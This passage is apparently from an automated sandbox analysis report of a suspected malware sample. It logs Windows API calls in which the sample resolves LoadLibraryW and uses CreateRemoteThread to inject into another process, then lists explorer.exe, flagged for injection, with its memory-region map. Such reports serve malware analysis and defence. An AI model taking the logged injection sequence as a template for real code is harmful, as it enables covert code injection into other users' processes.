CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="LoadLibraryW", cchWideChar=12, lpMultiByteStr=0x85286c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoadLibraryW", lpUsedDefaultChar=0x0) returned 12 [0262.963] GetProcAddress (hModule=0x77780000, lpProcName="LoadLibraryW") returned 0x777d3c01 [0262.963] CreateRemoteThread (in: hProcess=0xb4, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x777d3c01, lpParameter=0x3140000, dwCreationFlags=0x0, lpThreadId=0x17e4e4 | out: lpThreadId=0x17e4e4*=0x628) returned 0xb8 [0262.963] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0263.123] CloseHandle (hObject=0xb8) returned 1 [0263.123] CloseHandle (hObject=0xb4) returned 1 [0263.125] GetCurrentThreadId () returned 0x578 [0263.126] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0263.126] GetProcAddress (hModule=0x77780000, lpProcName="GetLogicalProcessorInformation") returned 0x777b2004 [0263.126] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77780000 [0263.126] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x1c4d68 [0263.126] GetProcAddress (hModule=0x77780000, lpProcName="GetLogicalProcessorInformation") returned 0x777b2004 [0263.127] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x17e674 | out: Buffer=0x0, ReturnedLength=0x17e674) returned 0 [0263.127] GetLastError () returned 0x7a [0263.127] GetLogicalProcessorInformation (in: Buffer=0x84b370, ReturnedLength=0x17e674 | out: Buffer=0x84b370, ReturnedLength=0x17e674) returned 1 [0263.127] GetCurrentThreadId () returned 0x578 [0263.127] GetCurrentThreadId () returned 0x578 [0263.127] GetCurrentProcess () returned 0xffffffff [0263.127] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x610000, lpBuffer=0x17e634, dwLength=0x1c | out: lpBuffer=0x17e634*(BaseAddress=0x610000, AllocationBase=0x610000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0263.127] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x611000, lpBuffer=0x17e634, dwLength=0x1c | out: lpBuffer=0x17e634*(BaseAddress=0x611000, AllocationBase=0x610000, AllocationProtect=0x80, RegionSize=0xd8000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0263.127] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x6e9000, lpBuffer=0x17e634, dwLength=0x1c | out: lpBuffer=0x17e634*(BaseAddress=0x6e9000, AllocationBase=0x610000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0263.127] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x6ea000, lpBuffer=0x17e634, dwLength=0x1c | out: lpBuffer=0x17e634*(BaseAddress=0x6ea000, AllocationBase=0x610000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0263.127] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x6eb000, lpBuffer=0x17e634, dwLength=0x1c | out: lpBuffer=0x17e634*(BaseAddress=0x6eb000, AllocationBase=0x610000, AllocationProtect=0x80, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0263.127] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x6f0000, lpBuffer=0x17e634, dwLength=0x1c | out: lpBuffer=0x17e634*(BaseAddress=0x6f0000, AllocationBase=0x610000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0263.127] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x6f1000, lpBuffer=0x17e634, dwLength=0x1c | out: lpBuffer=0x17e634*(BaseAddress=0x6f1000, AllocationBase=0x610000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0263.127] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x6f5000, lpBuffer=0x17e634, dwLength=0x1c | out: lpBuffer=0x17e634*(BaseAddress=0x6f5000, AllocationBase=0x610000, AllocationProtect=0x80, RegionSize=0x70000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0263.128] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x765000, lpBuffer=0x17e634, dwLength=0x1c | out: lpBuffer=0x17e634*(BaseAddress=0x765000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] ResetEvent (hEvent=0xa8) returned 1 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] ResetEvent (hEvent=0xa8) returned 1 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] CloseHandle (hObject=0xa8) returned 1 [0263.128] CloseHandle (hObject=0xac) returned 1 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.128] GetCurrentThreadId () returned 0x578 [0263.129] FreeLibrary (hLibModule=0x77780000) returned 1 [0263.129] LocalFree (hMem=0x1c4d68) returned 0x0 [0263.129] FreeLibrary (hLibModule=0x77780000) returned 1 [0263.129] LocalFree (hMem=0x1c4d18) returned 0x0 [0263.129] LocalFree (hMem=0x1c4cc0) returned 0x0 Process: id = "15" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7f0a8260" os_pid = "0x470" monitor_reason = "injection" parent_id = "14" os_parent_pid = "0x574" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" Region: id = 1528 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1529 start_va = 0x20000 end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1530 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1531 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1532 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1533 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1534 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1535 start_va = 0x80000 end_va = 0xbffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1536 start_va = 0xc0000 end_va = 0x126fff entry_point = 0xc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 1537 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1538 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1539 start_va = 0x210000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1540 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1541 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1542 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1543 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1544 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1545 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1546 start_va = 0x380000 end_va = 0x480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1547 start_va = 0x490000 end_va = 0x882fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1548 start_va = 0x890000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1549 start_va = 0x8d0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 1550 start_va = 0x9d0000 end_va = 0x9fbfff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1551 start_va = 0xa00000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 1552 start_va = 0xa30000 end_va = 0xa30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 1553 start_va = 0xa40000 end_va = 0xa40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1554 start_va = 0xa50000 end_va = 0xa51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1555 start_va = 0xa60000 end_va = 0xa60fff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 1556 start_va = 0xa70000 end_va = 0xa70fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 1557 start_va = 0xa80000 end_va = 0xa81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 1558 start_va = 0xa90000 end_va = 0xa91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1559 start_va = 0xaa0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 1560 start_va = 0xae0000 end_va = 0xbbefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 1561 start_va = 0xbc0000 end_va = 0xbc0fff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 1562 start_va = 0xbd0000 end_va = 0xbd2fff entry_point = 0xbd0000 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui" Region: id = 1563 start_va = 0xbe0000 end_va = 0xbe0fff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 1564 start_va = 0xbf0000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 1565 start_va = 0xc00000 end_va = 0xc08fff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 1566 start_va = 0xc10000 end_va = 0xc17fff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 1567 start_va = 0xc20000 end_va = 0xc3cfff entry_point = 0xc20000 region_type = mapped_file name = "{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db" Region: id = 1568 start_va = 0xc40000 end_va = 0xc40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 1569 start_va = 0xc50000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 1570 start_va = 0xc90000 end_va = 0xc93fff entry_point = 0xc90000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 1571 start_va = 0xca0000 end_va = 0xca3fff entry_point = 0xca0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 1572 start_va = 0xcb0000 end_va = 0xcb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 1573 start_va = 0xcc0000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 1574 start_va = 0xd40000 end_va = 0xd41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 1575 start_va = 0xd50000 end_va = 0xd50fff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 1576 start_va = 0xd60000 end_va = 0xfe0fff entry_point = 0xd90efa region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" Region: id = 1577 start_va = 0xff0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 1578 start_va = 0x1bf0000 end_va = 0x1ebefff entry_point = 0x1bf0000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 1579 start_va = 0x1ec0000 end_va = 0x1f67fff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 1580 start_va = 0x1f70000 end_va = 0x2023fff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 1581 start_va = 0x2030000 end_va = 0x2033fff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 1582 start_va = 0x2040000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 1583 start_va = 0x2080000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1584 start_va = 0x2280000 end_va = 0x22bffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1585 start_va = 0x22c0000 end_va = 0x22effff entry_point = 0x22c0000 region_type = mapped_file name = "{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db" Region: id = 1586 start_va = 0x22f0000 end_va = 0x22f3fff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 1587 start_va = 0x2300000 end_va = 0x2300fff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1588 start_va = 0x2310000 end_va = 0x234ffff entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 1589 start_va = 0x2350000 end_va = 0x2350fff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 1590 start_va = 0x2360000 end_va = 0x239ffff entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 1591 start_va = 0x23a0000 end_va = 0x23a0fff entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1592 start_va = 0x23b0000 end_va = 0x23effff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1593 start_va = 0x23f0000 end_va = 0x2455fff entry_point = 0x23f0000 region_type = mapped_file name = "{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" Region: id = 1594 start_va = 0x2460000 end_va = 0x2460fff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 1595 start_va = 0x2470000 end_va = 0x2470fff entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 1596 start_va = 0x2480000 end_va = 0x2480fff entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1597 start_va = 0x2490000 end_va = 0x2490fff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1598 start_va = 0x24a0000 end_va = 0x24a0fff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 1599 start_va = 0x24b0000 end_va = 0x24effff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 1600 start_va = 0x24f0000 end_va = 0x2e1ffff entry_point = 0x24f0000 region_type = mapped_file name = "StaticCache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" Region: id = 1601 start_va = 0x2e20000 end_va = 0x2e20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e20000" filename = "" Region: id = 1602 start_va = 0x2e30000 end_va = 0x2e31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e30000" filename = "" Region: id = 1603 start_va = 0x2e40000 end_va = 0x2e43fff entry_point = 0x2e40000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 1604 start_va = 0x2e50000 end_va = 0x2e51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e50000" filename = "" Region: id = 1605 start_va = 0x2e60000 end_va = 0x2e60fff entry_point = 0x2e60000 region_type = mapped_file name = "{7CD55808-3D38-4DD5-90C9-62F0E6EE60D4}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{7CD55808-3D38-4DD5-90C9-62F0E6EE60D4}.2.ver0x0000000000000001.db" Region: id = 1606 start_va = 0x2e70000 end_va = 0x2e73fff entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 1607 start_va = 0x2e80000 end_va = 0x2e80fff entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 1608 start_va = 0x2e90000 end_va = 0x2e90fff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 1609 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1610 start_va = 0x2eb0000 end_va = 0x2eeffff entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 1611 start_va = 0x2ef0000 end_va = 0x2feffff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 1612 start_va = 0x2ff0000 end_va = 0x2ff0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 1613 start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1614 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 1615 start_va = 0x3020000 end_va = 0x3020fff entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 1616 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x3030000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" Region: id = 1617 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x3040000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" Region: id = 1618 start_va = 0x3050000 end_va = 0x3051fff entry_point = 0x3050000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" Region: id = 1619 start_va = 0x3060000 end_va = 0x309ffff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 1620 start_va = 0x30a0000 end_va = 0x30a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030a0000" filename = "" Region: id = 1621 start_va = 0x30b0000 end_va = 0x30b0fff entry_point = 0x30b0000 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" Region: id = 1622 start_va = 0x30c0000 end_va = 0x30c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030c0000" filename = "" Region: id = 1623 start_va = 0x30d0000 end_va = 0x30d0fff entry_point = 0x30d0000 region_type = mapped_file name = "MMDevAPI.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" Region: id = 1624 start_va = 0x30e0000 end_va = 0x311ffff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 1625 start_va = 0x3120000 end_va = 0x3120fff entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 1626 start_va = 0x3130000 end_va = 0x3131fff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 1627 start_va = 0x3140000 end_va = 0x3140fff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 1628 start_va = 0x3150000 end_va = 0x318ffff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 1629 start_va = 0x3190000 end_va = 0x31dffff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 1630 start_va = 0x31e0000 end_va = 0x3227fff entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 1631 start_va = 0x3250000 end_va = 0x328ffff entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 1632 start_va = 0x32c0000 end_va = 0x32fffff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 1633 start_va = 0x3320000 end_va = 0x335ffff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 1634 start_va = 0x3390000 end_va = 0x33cffff entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 1635 start_va = 0x33d0000 end_va = 0x3402fff entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 1636 start_va = 0x3460000 end_va = 0x349ffff entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 1637 start_va = 0x34a0000 end_va = 0x359ffff entry_point = 0x34a0000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" Region: id = 1638 start_va = 0x35e0000 end_va = 0x36dffff entry_point = 0x35e0000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" Region: id = 1639 start_va = 0x36e0000 end_va = 0x37dffff entry_point = 0x36e0000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" Region: id = 1640 start_va = 0x3840000 end_va = 0x387ffff entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 1641 start_va = 0x3880000 end_va = 0x4bd4fff entry_point = 0x3880000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" Region: id = 1642 start_va = 0x4d00000 end_va = 0x4d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 1643 start_va = 0x4d40000 end_va = 0x5141fff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 1644 start_va = 0x5160000 end_va = 0x519ffff entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 1645 start_va = 0x51d0000 end_va = 0x520ffff entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 1646 start_va = 0x71880000 end_va = 0x71886fff entry_point = 0x718811d0 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" Region: id = 1647 start_va = 0x71890000 end_va = 0x718a3fff entry_point = 0x71891340 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" Region: id = 1648 start_va = 0x718b0000 end_va = 0x718b7fff entry_point = 0x718b4119 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" Region: id = 1649 start_va = 0x718c0000 end_va = 0x718f5fff entry_point = 0x718c9dae region_type = mapped_file name = "AudioSes.dll" filename = "\\Windows\\System32\\AudioSes.dll" Region: id = 1650 start_va = 0x71900000 end_va = 0x71903fff entry_point = 0x71901030 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" Region: id = 1651 start_va = 0x71910000 end_va = 0x7193ffff entry_point = 0x71913c6b region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" Region: id = 1652 start_va = 0x71940000 end_va = 0x71971fff entry_point = 0x719437f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" Region: id = 1653 start_va = 0x71980000 end_va = 0x71b17fff entry_point = 0x719812a1 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" Region: id = 1654 start_va = 0x71b20000 end_va = 0x71b35fff entry_point = 0x71b21d6d region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" Region: id = 1655 start_va = 0x71d80000 end_va = 0x71dd7fff entry_point = 0x71d815c0 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" Region: id = 1656 start_va = 0x71de0000 end_va = 0x71e09fff entry_point = 0x71de10ed region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" Region: id = 1657 start_va = 0x71e10000 end_va = 0x71ea3fff entry_point = 0x71e1d53d region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" Region: id = 1658 start_va = 0x71eb0000 end_va = 0x71f10fff entry_point = 0x71eb3921 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" Region: id = 1659 start_va = 0x71f20000 end_va = 0x72197fff entry_point = 0x71f27416 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" Region: id = 1660 start_va = 0x721f0000 end_va = 0x721f8fff entry_point = 0x721f153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" Region: id = 1661 start_va = 0x72200000 end_va = 0x7222dfff entry_point = 0x72201bba region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" Region: id = 1662 start_va = 0x72310000 end_va = 0x7235dfff entry_point = 0x7234816e region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" Region: id = 1663 start_va = 0x72820000 end_va = 0x72897fff entry_point = 0x72838b9b region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" Region: id = 1664 start_va = 0x728a0000 end_va = 0x728a5fff entry_point = 0x728a1140 region_type = mapped_file name = "IconCodecService.dll" filename = "\\Windows\\System32\\IconCodecService.dll" Region: id = 1665 start_va = 0x728b0000 end_va = 0x7291ffff entry_point = 0x728b1f65 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" Region: id = 1666 start_va = 0x72920000 end_va = 0x7292afff entry_point = 0x72921200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" Region: id = 1667 start_va = 0x72930000 end_va = 0x72938fff entry_point = 0x729311d0 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" Region: id = 1668 start_va = 0x72940000 end_va = 0x729a9fff entry_point = 0x72941abe region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" Region: id = 1669 start_va = 0x729b0000 end_va = 0x729e0fff entry_point = 0x729ba8b6 region_type = mapped_file name = "EhStorShell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" Region: id = 1670 start_va = 0x729f0000 end_va = 0x72a3bfff entry_point = 0x729f2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" Region: id = 1671 start_va = 0x72a40000 end_va = 0x72baefff entry_point = 0x72a4d50e region_type = mapped_file name = "ExplorerFrame.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" Region: id = 1672 start_va = 0x74070000 end_va = 0x74079fff entry_point = 0x74074d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" Region: id = 1673 start_va = 0x740a0000 end_va = 0x740b3fff entry_point = 